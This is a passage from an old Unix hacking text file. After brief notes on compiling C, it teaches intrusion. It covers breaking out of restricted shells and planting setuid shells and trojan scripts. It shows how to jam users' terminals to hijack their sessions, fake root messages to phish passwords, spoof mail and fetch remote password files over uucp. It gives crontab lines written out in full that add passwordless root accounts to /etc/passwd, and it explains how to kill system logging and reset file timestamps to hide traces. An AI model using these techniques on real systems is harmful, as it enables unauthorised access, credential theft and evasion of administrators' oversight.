  1616.  
  1617. COMPILING INDIVIDUAL MODULES
  1618. ----------------------------
  1619.         If you're working on a very large program, you will probably want to 
  1620. break it up into small modules. You compile the individual modules with the -c 
  1621. option, which only generates the object files for the module. Then, use the 
  1622. link editor to combine and compile the object files. The object files will be 
  1623. generated with the same name as the source files, but the file extension will 
  1624. be changed from .c to .o   When you have created all the object files for all 
  1625. of the modules, combine them with the ld (link editor) like this:
  1626.  
  1627. ld /lib/crtO.o [module] [module]... -lc
  1628.  
  1629. which will give you the final, compiled program, in a file named a.out. For 
  1630. example:
  1631.  
  1632. ld /lib/crtO.o part1.o part2.o -lc
  1633.  
  1634. You must remeber to include /lib/crtO.o and the -lc parts in the command, in 
  1635. the order shown. Also, the object files must be specified in the ld command 
  1636. in the order that they must be in the program (for instance, if part1 called 
  1637. part2, part2 can't be BEFORE part1).
  1638.  
  1639. CHECKING FOR ERRORS IN C PROGRAMS
  1640. ---------------------------------
  1641.         The lint command checks for errors and incompatibility errors in C 
  1642. source code. Type "lint [c source-code file]". Not all of the messages returned 
  1643. by lint are errors which will prevent the program from compiling or executing 
  1644. properly. As stated, it will report lines of code which may not be 
  1645. transportable to other Unix systems, unused variables, etc.
  1646.  
  1647. C BEAUTIFIER
  1648. ------------
  1649.         The cb (C beautifier) program formats C source code in an easy to read, 
  1650. "pretty" style. The format is "cb [file]". The output is to the screen, so if 
  1651. you want to put the formatted source code into a file, you must redirect the 
  1652. output.
  1653.  
  1654. SPECIAL C COMMANDS
  1655. ------------------
  1656.         The Unix C compiler has a command called system that executes Unix 
  1657. commands and programs as if you had typed in the commands from the keyboard. 
  1658. The format is:
  1659.  
  1660. system("command line")
  1661.  
  1662. Where command line is any command line you can execute from the shell, such as:
  1663.  
  1664. system("cat /etc/passwd")
  1665.  
  1666. Another command which performs a similar function is execvp. The format is:
  1667.  
  1668. execvp("command")
  1669.  
  1670. An interesting trick is to execute a shell program using execvp. This will make 
  1671. the program function as a shell.
  1672.  
  1673. HACKING THE UNIX SYSTEM
  1674. -----------------------
  1675.         This is it, kiddies, the one you've waded through all that rodent 
  1676. nonsense for! This section will describe advanced hacking techniques. Most of 
  1677. these techniques are methods of defeating internal security (I.E. security once 
  1678. you're actually inside the system). There is little to be said on the subject 
  1679. of hacking into the system itself that hasn't already been said in the earlier 
  1680. sections on logging in, Unix accounts, and Unix passwords. I will say this 
  1681. much- it's easier, and faster, to password hack your way from outside the 
  1682. system into a user account. Once you're actually inside the system, you will 
  1683. find it, using the techniques described in this section, almost easy to gain 
  1684. superuser access on most systems. (Not to mention that nothing is quite as 
  1685. rewarding as spending 3 days hacking the root account on a system, only to 
  1686. receive the message "not on console-disconnecting" when you finally find the 
  1687. proper password.) If you do not have a good understanding of the Unix operating 
  1688. system and some of its more important utilities already, you should read the 
  1689. earlier parts of this file before going on to this section.
  1690.  
  1691. OVERCOMING RSH RESTRICTIONS
  1692. ---------------------------
  1693.         The rsh (restricted Bourne shell) shell attempts to limit the commands 
  1694. available to a user by preventing him from executing commands outside of his 
  1695. searchpath, and preventing him from changing directories. It also prevents you 
  1696. from changing the value of shell variables directly (i.e. typing 
  1697. "variable=value"). There are some easy ways to overcome these restrictions.
  1698.         You can reference any file and directory in the system by simply using 
  1699. its full pathname. You can't change directories like this, or execute a file
  1700. that is outside of your searchpath, but you can do such things as list out the 
  1701. contents of directories, edit files in other directories, etc. (If you have 
  1702. access to the necessary commands.)
  1703.         The biggest flaw in rsh security is that the restrictions that are 
  1704. described above ignored when the account's profile file is executed upon logon. 
  1705. This means that, if you have access to the edit command, or some other means of 
  1706. modifying your account's profile, you can add a line to add a directory to your 
  1707. searchpath, thereby letting you execute any programs in that directory. The 
  1708. restriction on changing directories is also ignored during logon execution of 
  1709. the profile. So, if you absolutely, positively HAVE to go to another directory, 
  1710. you can add a cd command your .profile file.
  1711.  
  1712. OVERCOMING COPY AND WRITE RESTRICTIONS
  1713. --------------------------------------
  1714.         This is a simple trick. If you have read access t a file, but cannot 
  1715. copy it because of directory protections, simply redirect the output of the cat 
  1716. command into another file. If you have write access to a directory but not 
  1717. write access to a specific file, you can create a copy of the file, modify it 
  1718. (since it will be owned by your account), delete the original, and rename the 
  1719. copy to the name of the original.
  1720.  
  1721. DETACHED ACCOUNTS
  1722. -----------------
  1723.         This is a big security hole in many Unix systems. Occasionally, if a 
  1724. user is disconnected without logging off, his account may remain on-line, and 
  1725. still attached to the tty he was connected to the system through. Now, if 
  1726. someone calls to the system and and gets connected to that tty, he is 
  1727. automatically inside the system, inside the disconnected user's account. There 
  1728. are some interesting ways to take advantage of this flaw. For instance, if you 
  1729. desire to gain the passwords to more account, you can set a decoy program up to 
  1730. fake the login sequence, execute the program, and then disconnect from the 
  1731. system. Soon, some unlucky user will call the system and be switched into the 
  1732. detached account's tty. When they enter their username and password, the decoy 
  1733. will store their input in a file on the system, display the message "login 
  1734. incorrect", and then kill the detached account's shell process, thus placing 
  1735. the user at the real login prompt. A Unix decoy written by Shooting Shark will 
  1736. be given at the end of this file.
  1737.  
  1738. UID SHELLS
  1739. ----------
  1740.         When the uid bit is set on a shell program, executing this shell will 
  1741. change your user id to the user id of the account that owns the shell file, and 
  1742. you will have full use of that account, until you press control-d (ending the 
  1743. second shell process) and return to your normal user id. This gives you the 
  1744. power to execute any commands under that account's user id. This is better than 
  1745. knowing the account's password, since as long as the file remains on the 
  1746. system, you can continue to make use of that account, even if the password is 
  1747. changed. When I gain control of an account, I usually make a copy of the shell 
  1748. while logged in under that account in a nice, out of the way directory, and set 
  1749. its uid and gid bits. That way, if I should happen to lose the account (for 
  1750. instance, if the password were changed), I could log in under another account 
  1751. and still make use of the lost account by executing the uid shell.
  1752.  
  1753. FORCED DETACHING
  1754. ----------------
  1755.         This is an easy means of gaining the use of an account on systems with 
  1756. the detached account flaw. Usually, most terminal device files will have public 
  1757. write permission, so that the user that logs in under it can receive messages 
  1758. via write (unless he turns off messages with the mesg n command). This means 
  1759. that you can cat a file into the user's terminal device file. A compiled file, 
  1760. full of all kinds of strange control characters and garbage, works nicely. Say, 
  1761. the user is logged in on tty03. Just type cat /bin/sh > /dev/tty03. The user 
  1762. will see something like this on his screen:
  1763.  
  1764. LKYD;uiayh;fjahfasnf kajbg;aev;iuaeb/vkjeb/kgjebg;iwurghjiugj;di vd 
  1765. b/fujhf;shf;j;kajbv;jfa;vdblwituwoet8y6-
  1766. 2958ybp959vqvq43p8ytpgyeerv98tyq438pt634956b    v856    -868vcf-56-
  1767. e8w9v6bc[6[b6r8wpcvt
  1768.  
  1769. Hehehe! Now, the poor devil is confused. He tries to press break- no response, 
  1770. and the garbage just keeps coming. He tries to enter various commands, to no 
  1771. avail. Catting a file into his terminal device file "ties it up", so to speak, 
  1772. and since this is the file through which all I/O with his terminal is done, he 
  1773. finds it almost impossible to get any input through to the shell. He can't even 
  1774. log off! So, in desperation, he disconnects... It is best to execute the cat 
  1775. command as a background process, so that you can keep an eye on the users on 
  1776. the system. Usually, the user will call the system back and, unless he gets 
  1777. switched back into his old detached account (in which case he will usually hang 
  1778. up again), he will kill the detached account's login process. So, if you see 2 
  1779. users on the system using the same username, you know he's logged back in 
  1780. already. Anyways...after an appropriate length of time, and you feel that he's 
  1781. disconnected, log off and call the system back a few times until you get 
  1782. switched into the detached account. Then just create a uid shell owned by the 
  1783. account and you can use it any time you please, even though you don'tknow the 
  1784. password. Just remember one thing, though-when the cat command has finished 
  1785. displaying the compiled file on the victim's screen, if he is still logged on 
  1786. to that terminal, he will regain control. Use a long file!
  1787.  
  1788. FAKING WRITE MESSAGES
  1789. ---------------------
  1790.         Being able to write to other people's terminal files also makes it 
  1791. possible to fake write messages from any user on the system. For example, you 
  1792. wish to fake a message from root. Edit a file to contain these lines:
  1793. Message from root console ^g [note control-g (bell) character]
  1794. Bill, change your password to "commie" before logging off today. There has been 
  1795. a security leak.
  1796. <EOF>  [don't forget to put this-<EOF>-in the file.]
  1797. Now, type "who" to find bill's tty device, and type:
  1798.  
  1799. cat [filename] > /dev/ttyxx
  1800.  
  1801. Bill will see:
  1802.  
  1803. Message from root console [beep!]
  1804. Bill, change your password to "commie" before logging off today. There has been 
  1805. a security leak.
  1806. <EOF>
  1807.  
  1808. WHEN FILE PERMISSIONS ARE CHECKED
  1809. ---------------------------------
  1810.         Unix checks file permissions every time you issue a write or execute 
  1811. command to a file. It only checks read permissions, however, when you first 
  1812. issue the read command. For instance, if you issued the command to cat the 
  1813. contents of a file, and someone changed the file's permissions so that you did 
  1814. not have read permission while the process was still being executed, the cat 
  1815. command would continue as normal.
  1816.  
  1817. ONLINE TERMINAL READING
  1818. -----------------------
  1819.         You can also, if you have some means of assuming an account's userid, 
  1820. (such as having a uid shell for that account), you can read the contents of 
  1821. someone's terminal on-line. Just execute the uid shell and type "cat 
  1822. /dev/ttyxx &" (which will execute the cat command in the background, which will 
  1823. still display the contents to your screen, but will also allow you to enter 
  1824. commands). Once the person logs off, ownership of his terminal device file will 
  1825. revert to root (terminal device files are temporarily owned by the account 
  1826. logged in under them), but since you had the proper permissions when you 
  1827. started the read process, you can still continue to view the contents of that 
  1828. terminal file, and can watch, online, as the next use logs in. There is also 
  1829. one other trick that can sometimes be used to gain the root password, but 
  1830. should be exercised as a last resort, since it involved revealing your identity 
  1831. as a hacker to the superuser. On many systems, the superuser also has a normal 
  1832. user account that he uses for personal business, and only uses the root account 
  1833. for system management purposes. (This is, actually, a rather smart security 
  1834. move, as it lessens the chances of, say, things like his executing a trojan 
  1835. horse program while under the root account, which, to say the least, could be 
  1836. disastrous [from his point of view].) If you can obtain a uid shell for his 
  1837. user account, simply execute a read process of his terminal file in the 
  1838. background (while under the uid shell), and then drop back into your normal 
  1839. shell. Then send him a write message like:
  1840.  
  1841. I'm going to format your winchesters
  1842.  
  1843. When he uses the su command to go to the superuser account to kick you off the 
  1844. system, you can sit back and watch him type in the root password. (This should 
  1845. only be done if you have more than one account on the system- remember, many 
  1846. systems will not let you log into a superuser account remotely, and if the only 
  1847. account you have is a superuser account, you are effectively locked out of the 
  1848. system.)
  1849.  
  1850. MAIL FRAUD
  1851. ----------
  1852.         The TCP/IP protocol is a common protocol for file transfers between 
  1853. Unix systems, and between Unix and other operating systems. If the Unix system 
  1854. you are on features TCP/IP file transfers, it will have the telnet program on-
  1855. line, usually in the directory /bin.  This can be used to fake mail from any 
  1856. user on the system. Type "telnet" to execute the telnet program. You should 
  1857. see:
  1858.  
  1859. Telnet>
  1860.  
  1861. At this prompt, type "open [name] 25", where name is the uucp network name of 
  1862. the system you are on. This will connect you to the system's 25th port, used to 
  1863. receive network mail. Once connected, type:
  1864.  
  1865. rcpt to: [username]
  1866.  
  1867. Where username is the name of the user you wish to send mail to. Next, type:
  1868.  
  1869. mail from: [user]
  1870.  
  1871. Where user is the name of the use you wish the mail to appear from. You can 
  1872. also specify a non-existant user. You can also fake network mail from a user on 
  1873. another system. For information on the format of the address, see the section 
  1874. on the uucp facilities. Then type:
  1875.  
  1876. data
  1877.  
  1878. You will be prompted to enter the message. Enter "." on a blank line to end and 
  1879. send the mail. When you'e finished sending mail, type "quit" to exit.
  1880.  
  1881.         Thanks to Kid&CO. from Private Sector/2600 Magazine for that novel bit 
  1882. of information.
  1883.  
  1884. UNIX TROJAN HORSES
  1885. ------------------
  1886.         This is an old, OLD subject, and there's little original material to 
  1887. add about it. Trojan horses are programs that appear to execute one function, 
  1888. but actually perform another. This is perhaps the most common means of hacking 
  1889. Unix.
  1890.         One of the easiest means of setting up a Unix trojan horse is to place 
  1891. a program named after a system command, such as ls, "in the way" of someone's 
  1892. search path. For instance, if a user's searchpath is ".:/usr/bin", which means 
  1893. that the system searches the user's current directory for a command first, you 
  1894. could place a shell script in the user's home directory called "ls" that, when 
  1895. executed, created a copy of the shell, set the new shell file's uid and gid 
  1896. bits, echo an error message (such as "lsa: not found", leading the user to 
  1897. think he mistyped the command and the offending character was not echoed, due 
  1898. to line noise or whatever), and delete itself. When the user executes the ls 
  1899. command in his directory, the uid shell is created. Another good idea is to set 
  1900. the name of the trojan to a command in the user's login file, have it make the 
  1901. uid shell, execute the real command, and then delete itself.
  1902.         Another good way to set up a trojan horse is to include a few lines in 
  1903. a user's login file. Simply look at the user's password file entry to find out 
  1904. which shell he logs in under, and then modify the appropriate login file (or 
  1905. create one if it doesn't exist) to create a uid shell when the user logs on.
  1906.         If you can modify a user's file in the directory 
  1907. /usr/spool/cron/crontabs, you can add an entry to create a uid shell. Just 
  1908. specify * * * * * as the times, and wait about 1-2 minutes. In 1 minute, the 
  1909. cron utility will execute the commands in the user's crontab file. Then you can 
  1910. delete the entry. Again, if the user doesn't have a file in 
  1911. /usr/spool/cron/crontabs, you can create one.
  1912.         One last note- be sure you give the trojan horse execute permissionsm, 
  1913. otherwise the victim will receive the message "[filename]- cannot execute"... 
  1914. Kind of a dead giveaway.
  1915. CHANGING UID PROGRAMS
  1916. ---------------------
  1917.         If you have write access to a uid file, you can easily modify it to 
  1918. become a shell. First, copy the file. Then type:
  1919.  
  1920. cat /bin/sh > [uid file]
  1921.  
  1922. This will replace the file's contents with a shell program, but the uid bit 
  1923. will remain set. Then execute the file and create a well-hidden uid shell, and 
  1924. replace the subverted uid file with the copy.
  1925.  
  1926. ADDING AN ACCOUNT TO A UNIX SYSTEM
  1927. ----------------------------------
  1928.         To add an account to a Unix system, you must have write access to the 
  1929. password file, or access to the root account so that you can change the 
  1930. password file's protections. To add an account, simply edit the file with the 
  1931. text file editor, edit (or any of the other Unix editors, if you wish). Add an
  1932. entry like this:
  1933.  
  1934. [username]::[user#]:[group#]:[description]:[home directory]:[pathname of shell]
  1935.  
  1936. Notice that the password field is left blank. To set the password, type:
  1937.  
  1938. passwd [username]
  1939.  
  1940. You will then be prompted to enter and verify a password for the account.
  1941. If you wish the account to have superuser privileges, it must have a user 
  1942. number of zero.
  1943. UNIX BACKDOOR
  1944. -------------
  1945.         A backdoor is a means of by-passing a system's normal security for 
  1946. keeping unauthorized users out. For all the talk about back doors, they are 
  1947. rarely accomplished. But creating a backdoor in Unix System V is really quite 
  1948. easy. It simply requires adding a few entries to the file 
  1949. /usr/lib/crontab or /usr/spool/cron/crontabs/root. (Again, if the file doesn't 
  1950. exist, you can create it.) Add these lines, which will create 2 accounts on the
  1951. system, one a user account ("prop") and one a superuser account ("prop2"), at
  1952. 1 am system time every night, and delete them at 2 am every night.
  1953.  
  1954. 0 1 * * * chmod +w /etc/passwd
  1955. 1 1 * * * echo "prop::1:1::/:/bin/sh" >> /etc/passwd
  1956. 2 1 * * * echo "prop2::0:0::/:/bin/sh" >> /etc/passwd
  1957. 20 1 * * * grep -v "prop*:" /etc/passwd > /usr/spool/uucppublic/.p
  1958. 0 2 * * * cat /usr/spool/uucppublic/.p > /etc/passwd
  1959. 10 2 * * * chmod -w /etc/passwd
  1960. 15 2 * * * rm /usr/spool/uucppublic/.p
  1961.  
  1962. COVERING YOUR TRACKS
  1963. --------------------
  1964.         Naturally, you want to keep your cover, and not leave any trace that 
  1965. there is a hacker on the system. This section will give you some tips on how to 
  1966. do just that. First of all, the Unix system keeps track of when a file was last 
  1967. modified (see the information on the command ls -l in the section on file and 
  1968. directory protections). You don't want anyone noticing that a file has been 
  1969. tampered with recently, so after screwing around with a file, if at all 
  1970. possible, you should return its last modified date to its previous value using 
  1971. the touch command. The syntax for the touch command is:
  1972.  
  1973. touch hhmmMMdd [file]
  1974.  
  1975. Where hh is the hour, mm is the minute, MM is the month, and dd is the day. 
  1976. [file] is the name of the file you wish to change the date on.
  1977.         What usually gives hackers away are files they create on a system. If 
  1978. you must create files and directories, make use of the hidden files feature. 
  1979. Also, try to hide them in directories that are rarely "ls"'d, such as 
  1980. /usr/spool/lp, /usr/lib/uucp, etc (in other words, directories whose contents 
  1981. are rarely tampered with).
  1982.         Avoid use of the mail facilities, as anyone with the proper access can 
  1983. read the /usr/mail files. If you must send mail to another hacker on the 
  1984. system, write the message into a text file first, and encrypt it. Then mail it 
  1985. to the recipient, who can save the message without the mail header using the w 
  1986. option, and decrypt it.
  1987.         Rather than adding additional superuser accounts to a system, I've 
  1988. found it better to add simple user accounts (which don't stand out quite as 
  1989. much) and use a root uid shell (judiciously hidden in a rarely used directory) 
  1990. whenever I need superuser privileges. It's best to use a user account as much 
  1991. as possible, and only go to the superuser account whenever you absolutely need 
  1992. superuser priv's. This may prevent damaging accidents. And be careful when 
  1993. creating a home directory for any accounts you add. I've always found it better 
  1994. to use existing directories, or to add a hidden subdirectory to a little-
  1995. tampered with directory.
  1996.  
  1997.         Many systems have "watchdog" programs which log off inactive accounts 
  1998. after a certain period of time. These programs usually keep logs of this kind 
  1999. of activityl. Avoid sitting on the sitting doing nothing for long periods of 
  2000. time.
  2001.         While using some of the methods described in this file, you may replace 
  2002. a user's file with a modified copy. This copy will be owned by your account and 
  2003. group instead of the account which owned the original. You can change the group 
  2004. back to the original owner's group with the chgrp command, the format of which 
  2005. is:
  2006.  
  2007. chgrp [groupname] [file]
  2008.  
  2009. And change the owner back to the original with the chown command:
  2010.  
  2011. chown [user] [file]
  2012.  
  2013.         When you change ownership or group ownership of a file, the uid and gid 
  2014. bits respectively are reset, so you can't copy the shell, set its uid bit, and 
  2015. change its owner to root to gain superuser capabilities.
  2016.         Above all, just be careful and watch your step! Unix is a very flexible 
  2017. operating system, and even though it comes equipped with very little in the way 
  2018. of accounting, it is easy to add your own security features to it. If you do 
  2019. something wrong, such as attempting to log in under a superuser account 
  2020. remotely only to see "not on console-goodbye", assume that a note is made of 
  2021. the incident somewhere on the system. Never assume that something [anything!] 
  2022. won't be noticed. And leave the system and its files exactly as you found them. 
  2023. In short, just use a little common sense.
  2024.         If you're a real klutze, you can turn off the error logging (if you 
  2025. have root capabilities). I will include information on System V error logging, 
  2026. which most Unix clones will have error logging facilities similar to, and on 
  2027. Berkely Standard Distribution (BSD) Unix error logging.
  2028.  
  2029. BERKELY (BSD) UNIX ERROR LOGGING
  2030. --------------------------------
  2031. Type "cat /etc/syslog.pid". This file contains the 
  2032. process number of the syslog (error logging) program. Kill this process, and 
  2033. you stop the error logging. Remember to start the logging process back up after 
  2034. you're through stumbling around. 
  2035.         If you want to see where the error messages are sent, type:
  2036.  
  2037. cat /etc/syslog.config
  2038.  
  2039. Entries are in the form:
  2040.  
  2041. #file
  2042.  
  2043. Such as:
  2044.  
  2045. 5/etc/errlogfile
  2046.  
  2047. The number is the priority of the error, and the file is the file that errors 
  2048. of that priority or higher are logged to. If you see an entry with /dev/console 
  2049. as its log file, watch out! Errors of that priority will result in an error 
  2050. message being displayed on the system console. Sometimes, a list of usernames 
  2051. will follow an entry for errorlogging. This means that these users will be 
  2052. notified of any priorities of that level or higher.
  2053. There are 9 levels of priority to errors, and an estimation of their 
  2054. importance:
  2055.  
  2056. 9       -Lowly errors. This information is just unimportant junk used to debug
  2057.         small errors in the system operation that usually won't affect its
  2058.         performance. Usually discarded without a glance.
  2059.  
  2060. 8       -Usually just thrown away. These messages provide information on the
  2061.         system's operation, but nothing particularly useful.
  2062.  
  2063. 7       -Not greatly important, but stored for informational purposes.
  2064.  
  2065. 6       -System errors which can be recovered from.
  2066.  
  2067. 5       -This is the priority generally given to errors caused by hackers-
  2068.         not errors, but important information, such as security violatins:
  2069.         bad login and su attempts, attempts to access files without proper
  2070.         permissions, etc.
  2071.  
  2072. 4       -Errors of higher priority than 6.
  2073.  
  2074. 3       -Major hardware and software errors.
  2075.  
  2076. 2       -An error that requires immediate attention...very serious.
  2077.  
  2078. 1       -***<<<(((CRAAASSSHHH!!!)))>>>***-
  2079.  
  2080. SYSTEM V ERROR LOGGING
  2081. ----------------------
  2082.         System V error logging is relatively simple compared to Berkely Unix 
  2083. error logging. The System V error logging program is errdemon. To find the 
  2084. process id of the error logging program, type "ps -uroot". This will give you a 
  2085. list of all the processes run under the root id. You will find /etc/errdemon 
  2086. somewhere in the list. Kill the process, and no more error logging. The 
  2087. errdemon program is not as sophisticated as BSD Unix's syslog program: it only 
  2088. logs all errors into a file (the default file is /usr/adm/errfile, but another 
  2089. file can be specified as an argument to the program when it is started). 
  2090. Errdemon does not analyze the errors as syslog does, it simply takes them from 
  2091. a special device file called /dev/error and dumps them into the error logging 
  2092. file. If you wish to examine the error report, use the errpt program, which 
  2093. creates a report of the errors in the error logging file and prints it out on 
  2094. the stanard output. The format is: errpt [option] [error logging file]. For a 
  2095. complete report of all errors, use the -a option:
  2096.  
  2097. errpt -a /usr/adm/errfile
  2098.  
  2099. The output is very technical, however, and not of much use to the hacker.
  2100.  
  2101. UUCP NETWORKING
  2102. ---------------
  2103.         This section will cover the workings and use of the Unix uucp 
  2104. facilities. UUCP stands for Unix to Unix Copy. The uucp utilities are for the 
  2105. exchange of files between Unix systems. There also facilities for users to dial 
  2106. out and interact with remote systems, and for executing limited commands on 
  2107. remote systems without logging in.
  2108.  
  2109. OUTWARD DIALING
  2110. ---------------
  2111.         The command for outward dialing is cu. The format is:
  2112.  
  2113. cu -n[phone number]
  2114.  
  2115. Such as:
  2116.  
  2117. cu -n13125285020
  2118.  
  2119. On earlier versions of Unix, the format was simply "cu [phone number]".
  2120.  
  2121. Note, that the format of the phone number may be different from system to 
  2122. system- for instance, a system that dials outward off of a pbx may need to have 
  2123. the number prefixed by a 9, and one that uses an extender may not need to have 
  2124. the number (if long distance) preceded by a 1. To dial out, however, the system 
  2125. must have facilities for dialing out. The file /usr/lib/uucp/Devices (called 
  2126. L-devices on earlier systems) will contain a list of the available dialout 
  2127. devices. Entries in this file are in the format:
  2128.  
  2129. [device type]  [device name]  [dial device]  [linespeed]  [protocol, optional]
  2130.  
  2131. Device type is one of 2 types: ACU and DIR. If ACU, it is a dialout device. DIR 
  2132. is a direct connection to a specific system.  Device name is the name of the 
  2133. base name of the dialout device's device file, which is located in the /dev 
  2134. directory. Dial device is usually an unused field. It was used on older systems 
  2135. where one device (device name in the above example) was used to exchange data, 
  2136. and another device (dial device, above) did the telephone dialing. In the age 
  2137. of the autodial modem, this is a rarely used feature. The next, linespeed, is 
  2138. the baud rate of the device, usually either 300, 1200, or 2400, possibly 4800 
  2139. or 9600 if the device is a direct connection. The protocol field is for 
  2140. specifying the communications protocol. This field is optional and generally 
  2141. not used. Here is an example entry for a dialout device and a direct 
  2142. connection:
  2143.  
  2144. ACU  tty99  unused  1200
  2145. DIR  tty03  unused  9600
  2146.  
  2147. If a dialout device is capable of more than one baud rate, it must have 2 
  2148. entries in the Devices (L-devices) file, one for each baud rate. Note, that the 
  2149. device in the above example is a tty- usually, dialout device names will be in 
  2150. the form tty##, as they can be used both for dialing out, and receiving 
  2151. incoming calls. The device can be named anything, however.
  2152.  
  2153. There are several options worth mentioning to cu:
  2154. -s      Allows you to specify the baud rate. There must be a device in the
  2155.         Devices file with this speed.
  2156. -l      Allows you to specify which device you wish to use.
  2157.  
  2158. If you wish to connect to a system that there is a direct connection with, 
  2159. simply type "cu -l[device]". This will connect you to it. You can also do that 
  2160. do directly connect to a dialout device, from which point, if you know what 
  2161. commands it accepts, you can give it the dial commands directly.
  2162.  
  2163. Using the cu command is basically the same as using a terminal program. When 
  2164. you use it to connect to a system, you then interact with that system as if you 
  2165. dialed it directly from a terminal. Like any good terminal program, the cu 
  2166. "terminal program" provides facilities for file transfers, and other commands. 
  2167. Here is a summary of the commands:
  2168.  
  2169. ~.                 -Disconnect from the remote system.
  2170.  
  2171. ~!                 -Temporarily execute a shell on the local system. When you 
  2172.                    wish to return to the remote system, press control-D.
  2173.  
  2174. ~![cmd]            -Execute a command on the local system. Example: ~!ls -a
  2175.  
  2176. ~$[cmd]            -Execute a command on the local system and send the output to
  2177.                    the remote system.
  2178.  
  2179. ~%put f1 f2        -Sends a file to the remote system. F1 is the name of the
  2180.                    file on the local system, and f2 is the name to be given the
  2181.                    copy made on the remote system.
  2182.  
  2183. ~take f1 f2        -Copies a file from the remote to the local system. F1 is
  2184.                    the name of the remote file, and f2 is the name to be given
  2185.                    to the local copy.
  2186.  
  2187. Note, that the commands for transferring output and files will only work if you 
  2188. are communicating with another Unix system.
  2189.         You may be wondering how you can find out the format for the phone 
  2190. number, which is necessary to dial out. The format can be obtained from the 
  2191. file /usr/lib/uucp/Systems (called L.sys on earlier Unix systems). This file 
  2192. contains the uucp network names and phone numbers of other Unix systems, as 
  2193. well as other information about them. This file contains the information needed 
  2194. to carry out uucp file transfers with the systems listed within it. The entries 
  2195. are in the format:
  2196.  
  2197. [system name]  [times]  [devicename]  [linespeed]  [phone number]  [login info]
  2198.  
  2199. System name is the name of the system.
  2200. Times is a list of the times when the system can be contacted. This field will 
  2201. usually just have the entry "Any", which means that the system can be contacted 
  2202. at any time. Never means that the system can never be called. You can also 
  2203. specify specific days and times when the system can be contacted. The days are 
  2204. abbreviated like this:
  2205. Su Mo Tu We Th Fr Sa
  2206. Where Su is Sunday, Mo is Monday, etc. If the system can be called on more than 
  2207. one day of the week, you can string the days together like this:SuMoTu for 
  2208. Sunday, Monday, and Tuesday. You can also specify a range of hours when the 
  2209. system can be called, in the 24 hour format, like this: Su,0000-0100 means that 
  2210. the system can be called Sunday from midnight to 1am. The week days (Monday 
  2211. through Friday) can be abbreviated as Wk.
  2212. Device name is the name of the device to call the system with. If the system is 
  2213. directly connected, this file will contain the base name of the device file of 
  2214. the device which connects it to the local system. If the system has to be 
  2215. dialed over the phone, this field will be "ACU".
  2216. Linespeed is the baud rate needed to connect to the system. There must be a 
  2217. device available with the specified baud rate to contact the system.
  2218. Phone number is the phone number of the system. By looking at these entries, 
  2219. you can obtain the format for the phone number. For instance, if this field 
  2220. contained "913125285020" for an entry, you would know that the format would be 
  2221. 9+1+area code+prefix+suffix. 
  2222. The login field contains information used for uucp transfers, and will be 
  2223. discussed in detail later.
  2224.         Sometimes you will see alphabetic or other strange characters in the 
  2225. phone number field. Sometimes, these may be commands for the particular brand 
  2226. of modem that the system is using to dialout, but other times, these may 
  2227. actually be a part of the phone number. If so, the meaning of these characters 
  2228. called tokens can be found in the file /usr/lib/uucp/Dialcodes (called
  2229. L-dialcodes on earlier systems). Entries in this file are in the form:
  2230.  
  2231. token   translation
  2232.  
  2233. For example:
  2234.  
  2235. chicago  312
  2236.  
  2237. Would mean that the token chicago means to dial 312. So, if the phone number 
  2238. field of a Systems entry was:
  2239.  
  2240. chicago5285020
  2241.  
  2242. It would mean to dial 3125285020.
  2243.  
  2244. You can add an entry to the Systems file for systems that you wish to call 
  2245. frequently. Simply edit the file using one of the Unix system's editors, and 
  2246. add an entry like this:
  2247.  
  2248. ripco  Any ACU 1200 13125285020 unused
  2249.  
  2250. And then any time you wished to call the BBS Ripco, you would type:
  2251.  
  2252. cu ripco
  2253.  
  2254. And the system would do the dialing for you, drawing the phone number from the 
  2255. entry for Ripco in the Systems file.
  2256.  
  2257. HOW UUCP TRANSFERS WORK
  2258. -----------------------
  2259.         This section will detail how a uucp file transfer works. When you issue 
  2260. the command to transfer a file to/from a remote system, the local system dials 
  2261. out to the remote system. Then, using the information contained in the login 
  2262. field of the Systems file, it logs into an account on the remote system, in 
  2263. exactly the same manner as you would log into a Unix system. Usually, however, 
  2264. uucp accounts use a special shell, called uucico, which implements certain 
  2265. security features which (are supposed to) keep the uucp account from being used 
  2266. for any other purpose than file transfers with another Unix system. (Note: not 
  2267. ALL uucp accounts will use this shell.) If you've ever logged into the uucp 
  2268. account on the system and received the message, "Shere=[system name]", and the 
  2269. system wouldn't respond to any of your input, that account was using the uucico 
  2270. shell, which prevents the account from being used as a normal "user" account. 
  2271. The local system then requests the transfer, and if security features of the 
  2272. remote system which will be discussed later do not prevent the transfer, the 
  2273. file will be copied to (or from if you requested to send a file) the local 
  2274. system. The account is then logged off of the remote system, and the connection 
  2275. is dropped.
  2276.  
  2277. ADDING A LOGIN FIELD TO A SYSTEMS ENTRY
  2278. --------------------------------------
  2279.         Many superusers feel that if the uucp account uses the uucico shell, 
  2280. that it is "secure". Because of this, they may ignore other uucp security 
  2281. measures, and probably not give the account a password. If you find such a 
  2282. system, you can add an entry for the system to the Systems (L.sys) file of 
  2283. another Unix system and try to, say, transfer a copy of its password file. To 
  2284. do so, simply follow the outline in the section on cu for how to add an entry 
  2285. to the Systems file. That will cover everything but how to add the login field, 
  2286. which is covered in this section. 
  2287.         The login section consists of expect/sendsubfields. For example, here 
  2288. is an example login field:
  2289.  
  2290. ogin: uucp assword: uucp
  2291.  
  2292. The first subfield is what is expected from the remote system, in this case 
  2293. "ogin:". This means to expect the login prompt, "Login:". Note, that you do not 
  2294. have to enter the complete text that the remote system sends, the text sent 
  2295. from the remote system is scanned left to right as it is sent until the 
  2296. expected text is found. The second subfield contains the local system's 
  2297. response, which is sent to the remote system. In this case, the local system 
  2298. sends "uucp" when it receives the login prompt. Next, the local system scans 
  2299. the output from the remote system until it receives "assword:" ("password:"), 
  2300. then sends "uucp" (the password, in this example, for the uucp account). 
  2301. Because of line noise or other interference, when the local system connects to 
  2302. the remote, it may not receive the expected string. For this possibility, you 
  2303. may specify the expected string several times, like this:
  2304.  
  2305. ogin:-ogin: uucp assword:-assword: uucp
  2306.  
  2307. The - separates that if the expected string is not received, to expect the 
  2308. string specified after the hyphen. Sometimes, you may need to send a special 
  2309. character, such as kill or newline, to the system if the expected string is not 
  2310. received. You can do that like this:
  2311.  
  2312. ogin:-BREAK-ogin: uucp assword: uucp
  2313.  
  2314. The -BREAK- means that if ogin: isn't received the first time, to send a break 
  2315. signal to the remote system, and then expect ogin: again. Other common entries 
  2316. are:
  2317.  
  2318. ogin:-@-ogin:           Send a kill character if the expected string isn't
  2319.                         received the first time.
  2320. ogin:-EOT-ogin:         Send a control-D if the expected string isn't received.
  2321. ogin:--ogin:            Send a null character if the expected string isnt' 
  2322.                         received.
  2323.  
